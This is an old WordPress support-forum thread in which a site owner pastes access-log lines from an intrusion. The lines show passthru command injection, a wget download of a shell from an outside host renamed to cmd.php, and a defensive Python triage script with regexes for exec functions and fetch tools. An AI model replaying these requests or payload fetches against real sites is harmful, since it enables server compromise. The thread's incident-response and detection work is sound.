WordPress.org


New Exploit? (2 posts)

  1. clar2242
    Member
    Posted 6 years ago #

    Hey, just wondering if anybody has experienced this before...

    Last night I was alerted that my server was down, got it rebooted and tried to figure out what happened.

    Looks like somehow somebody got r57 shell uploaded to my server.

    Looking through my access logs:

    80.218.10.244 - - [14/Feb/2008:20:54:25 +0000] "GET /?mycmd=passthru("id"); HTTP/1.0" 200 19911 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:28 +0000] "GET /?mycmd=passthru("uname+-a"); HTTP/1.0" 200 19958 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:33 +0000] "GET /?mycmd=passthru("w"); HTTP/1.0" 200 20145 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:42 +0000] "GET /?mycmd=passthru("pwd"); HTTP/1.0" 200 19896 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:46 +0000] "GET /?mycmd=passthru("ls+-lah"); HTTP/1.0" 200 22356 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:54:58 +0000] "GET /?mycmd=passthru("wget+coded.altervista.org%2Fcmd.txt"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:55:11 +0000] "GET /cmd.txt HTTP/1.1" 200 98799 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
    80.218.10.244 - - [14/Feb/2008:20:55:21 +0000] "GET /?mycmd=passthru("mv+cmd.txt+cmd.php"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
    80.218.10.244 - - [14/Feb/2008:20:55:26 +0000] "GET /cmd.php HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
    80.218.10.244 - - [14/Feb/2008:20:56:20 +0000] "POST /cmd.php HTTP/1.1" 200 33523 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"

    Any ideas where the mycmd stuff is done? I can't find it by doing a recursive grep.

    And I can't recreate this doing it myself. Any ideas?

    I've updated to 2.3.3 this morning.
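The log lines above are a textbook second-stage sequence: probe a code-execution hole with harmless commands (id, uname, w, pwd, ls), pull a payload with wget, rename it to .php, then drive it by POST. The following is an added example, not code from the thread or from WordPress, that parses Apache combined-format lines and flags that pattern: PHP execution functions or download tools in a query value, the Snoopy User-Agent (the default UA of the Snoopy PHP HTTP client, i.e. a script rather than a browser), and later direct requests for any file the earlier commands created or renamed. The ten attacker lines are copied from the post; the 10.0.0.5 line is constructed so the filter has a benign request to ignore. The function and pattern names are my own.

```python
"""Triage Apache access-log lines for command-execution probes (added example)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format. The pasted lines show the inner quotes of the request
# line unescaped; a real log would hold \" there, which \S+ also accepts because
# the request target never contains a space.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# PHP functions that run code or shell commands when handed request input.
EXEC_FUNCS = re.compile(
    r'\b(passthru|system|exec|shell_exec|popen|proc_open|eval|assert)\s*\(', re.I)
# Commands used to pull a second stage onto the host.
FETCH_CMDS = re.compile(r'\b(wget|curl|fetch|lynx)\b', re.I)
# Filenames mentioned in a command; used to follow the dropped files afterwards.
FILE_TOKENS = re.compile(r'\b([\w-]+\.(?:php\d?|phtml|txt|pl|sh))\b', re.I)
# Default User-Agent prefix of the Snoopy PHP HTTP client: a script, not a browser.
SCRIPT_UA_PREFIXES = ('Snoopy',)

# Ten lines from the post above, preceded by one constructed benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Feb/2008:20:50:00 +0000] "GET /?p=12 HTTP/1.1" 200 18211 "-" "Mozilla/5.0 (constructed benign request)"
80.218.10.244 - - [14/Feb/2008:20:54:25 +0000] "GET /?mycmd=passthru("id"); HTTP/1.0" 200 19911 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:28 +0000] "GET /?mycmd=passthru("uname+-a"); HTTP/1.0" 200 19958 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:33 +0000] "GET /?mycmd=passthru("w"); HTTP/1.0" 200 20145 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:42 +0000] "GET /?mycmd=passthru("pwd"); HTTP/1.0" 200 19896 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:46 +0000] "GET /?mycmd=passthru("ls+-lah"); HTTP/1.0" 200 22356 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:54:58 +0000] "GET /?mycmd=passthru("wget+coded.altervista.org%2Fcmd.txt"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:55:11 +0000] "GET /cmd.txt HTTP/1.1" 200 98799 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
80.218.10.244 - - [14/Feb/2008:20:55:21 +0000] "GET /?mycmd=passthru("mv+cmd.txt+cmd.php"); HTTP/1.0" 200 19857 "-" "Snoopy v1.2.3"
80.218.10.244 - - [14/Feb/2008:20:55:26 +0000] "GET /cmd.php HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
80.218.10.244 - - [14/Feb/2008:20:56:20 +0000] "POST /cmd.php HTTP/1.1" 200 33523 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071229 Firefox/2.0.0.11"
"""


def split_query(query):
    """Decode the query string the way PHP fills $_GET ('+' and %xx decoded)."""
    pairs = []
    for item in query.split('&'):
        if item:
            name, _, value = item.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['query'] = split_query(parts.query)
    return rec


def analyze(lines):
    """Return one finding per suspicious request, in log order."""
    findings = []
    dropped = set()  # web-root paths that earlier commands created or renamed
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        for name, value in rec['query']:
            if EXEC_FUNCS.search(value):
                reasons.append(f'exec function in ?{name}=')
            if FETCH_CMDS.search(value):
                reasons.append('remote fetch in command')
            if reasons:
                # Any file a command touches may be requested directly later on.
                dropped.update('/' + f for f in FILE_TOKENS.findall(value))
        if rec['path'] in dropped:
            reasons.append(f"request for attacker-dropped file {rec['path']}")
        if rec['ua'].startswith(SCRIPT_UA_PREFIXES):
            reasons.append('scripted client User-Agent')
        if reasons:
            findings.append({'ts': rec['ts'], 'ip': rec['ip'], 'method': rec['method'],
                             'path': rec['path'], 'status': rec['status'],
                             'size': rec['size'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['path']} -> {f['status']} {f['size']}: "
              + '; '.join(f['reasons']))
```

Two things worth reading off the output. The response size changes with each command (19911 for id, 22356 for ls -lah), which is what you would expect if the command output was echoed into the page, and the 200 on GET /cmd.txt shows the wget landed in the document root. When a grep for the literal parameter name finds nothing, grep the web root for the sink instead (passthru, eval, base64_decode next to $_GET, $_POST or $_REQUEST), since a backdoor need not name its parameter as a string.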

  2. Kafkaesqui

    Posted 6 years ago #

    There is no 'mycmd' GET query var in WordPress. Apparently a blind attempt to test for exploits (not hard to guess what ?mycmd= is meant for, though -- anyone know of a WP plugin using it?). But I would do the standard of password changes, check of permissions on files/directories, etc.

    [Moderator note: moving to Misc. forum]
